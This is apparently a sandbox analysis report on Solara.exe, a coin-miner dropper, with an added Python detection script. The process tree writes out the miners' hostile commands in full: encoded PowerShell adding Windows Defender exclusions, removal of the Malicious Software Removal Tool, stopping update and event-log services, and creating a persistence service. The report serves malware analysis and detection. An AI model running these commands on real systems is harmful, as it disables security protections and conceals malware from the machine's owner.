Windows Analysis Report
Solara.exe

Overview

General Information

Sample name: Solara.exe
Analysis ID: 1585410
MD5: a6bf6970741f337bcb700166165c1f30
SHA1: f90ace8f03e2b76e243d539c8570d157f658d025
SHA256: 139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1
Tags: CoinMiner, exe, user-aachum

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Encrypted powershell cmdline option found
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Solara.exe (PID: 2824 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: A6BF6970741F337BCB700166165C1F30)
    • powershell.exe (PID: 7032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eth.exe (PID: 6392 cmdline: "C:\Users\user\AppData\Local\Temp\eth.exe" MD5: 87C3DD67BFA3009D89F7B45B01D705B8)
      • powershell.exe (PID: 3576 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7852 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 7740 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7936 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8052 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8144 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7320 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 5236 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • sc.exe (PID: 2072 cmdline: C:\Windows\system32\sc.exe delete "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7572 cmdline: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7852 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7860 cmdline: C:\Windows\system32\sc.exe start "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xmr.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\xmr.exe" MD5: 154202154E41175E801A698CA940EB0C)
      • powershell.exe (PID: 6352 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7908 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 7732 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7916 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8016 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8096 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8164 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 2700 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • sc.exe (PID: 5280 cmdline: C:\Windows\system32\sc.exe delete "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7484 cmdline: C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7192 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7440 cmdline: C:\Windows\system32\sc.exe start "ARIBLEUL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara Bootstrapper.exe (PID: 3788 cmdline: "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe" MD5: 00A1864355A5EA47902E5757C0D87FD9)
      • powershell.exe (PID: 6728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • kx new.exe (PID: 5032 cmdline: "C:\Users\user\AppData\Local\Temp\kx new.exe" MD5: D9D13FA25E880665FB471A4BE57C494C)
        • powershell.exe (PID: 3808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Kawpow new.exe (PID: 7304 cmdline: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" MD5: FB6A3B436E9F9402937D95F755B62F91)
          • powershell.exe (PID: 7332 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • xmr new.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)
          • powershell.exe (PID: 7508 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5604 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • wusa.exe (PID: 432 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
          • sc.exe (PID: 7644 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5852 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6596 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 7808 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SolaraBootstrapper.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lrgkmixyjzta.exe (PID: 7828 cmdline: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe MD5: 87C3DD67BFA3009D89F7B45B01D705B8)
  • cleanup
No configs have been found
No yara matches
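The tree above repeats one evasion chain under each dropped miner: a PowerShell Add-MpPreference call (three times wrapped in -EncodedCommand, which is Base64 over UTF-16LE; decoded, PID 7032's argument is `<#pxn#>Add-MpPreference <#ayf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gae#> -Force <#wep#>`, so the exclusion covers the whole system volume and the `<#...#>` block comments exist only to break string matching), `wusa /uninstall /kb:890830` (KB890830 is the Malicious Software Removal Tool), `sc stop` of the update services and of eventlog, and a service created from C:\ProgramData. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it decodes and normalizes the PowerShell payload and runs checks modelled on the Sigma hits over process-creation events constructed from this tree (field names follow Sysmon Event ID 1; PIDs and command lines are copied from the report; the rule names and the wusa.exe image path are the example's own).

```python
"""Decode and check the PowerShell / sc.exe evasion chain from the process tree.

Added example for this page, not code from the Joe Sandbox report or from the
sample. EVENTS is constructed from the report's tree (PIDs and command lines
copied from it) with Sysmon Event ID 1 field names; rule names are my own.
"""
import base64
import re

# -EncodedCommand argument of PID 7032, copied verbatim from the report.
ENCODED_COMMAND = (
    "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAA"
    "KAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMA"
    "eQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIA"
    "YwBlACAAPAAjAHcAZQBwACMAPgA="
)

BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.DOTALL)
ENCODED_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+\"?([A-Za-z0-9+/=]{16,})", re.I)
EXCLUSION_RE = re.compile(r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)", re.I)
BROAD_SCOPE_RE = re.compile(r"\$env:(?:SystemDrive|ProgramData|UserProfile)", re.I)
BINPATH_RE = re.compile(r'binpath=\s*(?:"([^"]*)"|(\S+))', re.I)
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

# Constructed from the report's process tree; conhost is the benign control case.
EVENTS = [
    {"ProcessId": 7032, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "'
                    + ENCODED_COMMAND + '"'},
    {"ProcessId": 5036, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 3576, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
                    r"-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"},
    {"ProcessId": 7908, "Image": r"C:\Windows\System32\wusa.exe",  # image path assumed
     "CommandLine": "wusa /uninstall /kb:890830 /quiet /norestart"},
    {"ProcessId": 7936, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"},
    {"ProcessId": 7572, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= '
                    r'"C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"'},
    {"ProcessId": 7192, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"C:\Windows\system32\sc.exe stop eventlog"},
]


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is Base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def normalize_powershell(script: str) -> str:
    """Strip <# ... #> block comments and collapse whitespace; the sample's junk
    comments (<#pxn#>, <#ayf#>, ...) change nothing about what PowerShell runs."""
    return " ".join(BLOCK_COMMENT_RE.sub(" ", script).split())


def effective_powershell(cmdline: str) -> str:
    """Return the script PowerShell will actually execute for a command line."""
    m = ENCODED_FLAG_RE.search(cmdline)
    script = decode_encoded_command(m.group(1)) if m else cmdline
    return normalize_powershell(script)


def check_event(ev: dict) -> list:
    """Return the rule names a process-creation event trips (empty if none)."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    hits = []
    if image == "powershell.exe":
        if ENCODED_FLAG_RE.search(cmd):
            hits.append("powershell_encoded_command")
        script = effective_powershell(cmd)
        if EXCLUSION_RE.search(script):
            hits.append("defender_exclusion_added")
            # $env:SystemDrive excludes the entire system volume from scanning.
            if BROAD_SCOPE_RE.search(script):
                hits.append("defender_exclusion_broad_scope")
    elif image == "sc.exe":
        args = [a.strip('"').lower() for a in cmd.split()]
        if "stop" in args and "eventlog" in args:
            hits.append("eventlog_service_stopped")
        if "stop" in args and UPDATE_SERVICES & set(args):
            hits.append("windows_update_service_stopped")
        m = BINPATH_RE.search(cmd)
        binpath = (m.group(1) or m.group(2)).lower() if m else ""
        if "create" in args and binpath.startswith("c:\\programdata\\"):
            hits.append("service_created_from_programdata")
    elif image in ("wusa.exe", "cmd.exe") and re.search(r"/uninstall\s+/kb:890830", cmd, re.I):
        hits.append("msrt_uninstall_attempt")  # KB890830 is the Malicious Software Removal Tool
    return hits


def scan(events: list) -> dict:
    """Map ProcessId -> tripped rules for every event that tripped at least one."""
    out = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            out[ev["ProcessId"]] = hits
    return out


if __name__ == "__main__":
    print(effective_powershell(EVENTS[0]["CommandLine"]))
    for pid, hits in scan(EVENTS).items():
        print(pid, ", ".join(hits))
```

Match on the decoded, comment-stripped script rather than on the raw command line: the three encoded variants in the tree (PIDs 7032, 6728 and 3808) differ only in the random comment bodies, so a signature on the raw Base64 written for one misses the other two, and the plain-text variant under eth.exe and xmr.exe excludes $env:ProgramData plus every .exe instead of $env:SystemDrive.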

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 2824, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", ProcessId: 7032, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\eth.exe", ParentImage: C:\Users\user\AppData\Local\Temp\eth.exe, ParentProcessId: 6392, ParentProcessName: eth.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3576, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 2824, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=", ProcessId: 7032, ProcessName: powershell.exe
